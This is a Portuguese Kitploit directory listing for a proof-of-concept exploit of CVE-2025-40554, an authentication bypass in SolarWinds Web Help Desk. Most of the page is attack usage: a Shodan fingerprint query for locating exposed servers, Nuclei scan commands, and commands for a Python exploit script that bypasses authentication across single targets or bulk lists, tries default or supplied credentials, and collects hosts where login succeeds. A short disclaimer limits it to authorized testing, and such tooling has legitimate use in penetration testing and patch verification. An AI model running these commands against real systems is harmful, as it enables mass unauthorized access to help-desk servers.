Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
auth-bypass-CVE-2025-40554 — Exploit de prova de conceito para CVE-2025-40554, um bypass de autenticação no SolarWinds Web Help Desk. Inclui template Nuclei e exploit Python para teste em alvo único ou em lote com login opcional de credenciais. | Kitploit
Ferramentas/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Autenticação e AutorizaçãoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Exploit de prova de conceito para CVE-2025-40554, um bypass de autenticação no SolarWinds Web Help Desk. Inclui template Nuclei e exploit Python para teste em alvo único ou em lote com login opcional de credenciais.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
14há 7 mesesAinda não revisado

CVE-2025-40554 – Prova de Conceito de Bypass de Autenticação no SolarWinds Web Help Desk

Consulta Shodan

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

Uso

Alvo único (bypass + login, padrão cliente/cliente):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
imagem

Alvo único com credenciais personalizadas:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Alvo único, apenas bypass (sem login):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Lista de alvos (salva apenas vulnerável+login):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Lista de alvos com credenciais personalizadas:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Modo silencioso (imprime apenas URLs onde o login foi bem-sucedido):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

Aviso Legal

Esta Prova de Conceito é apenas para pesquisa e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Os autores não são responsáveis pelo uso indevido.

Baixar ferramenta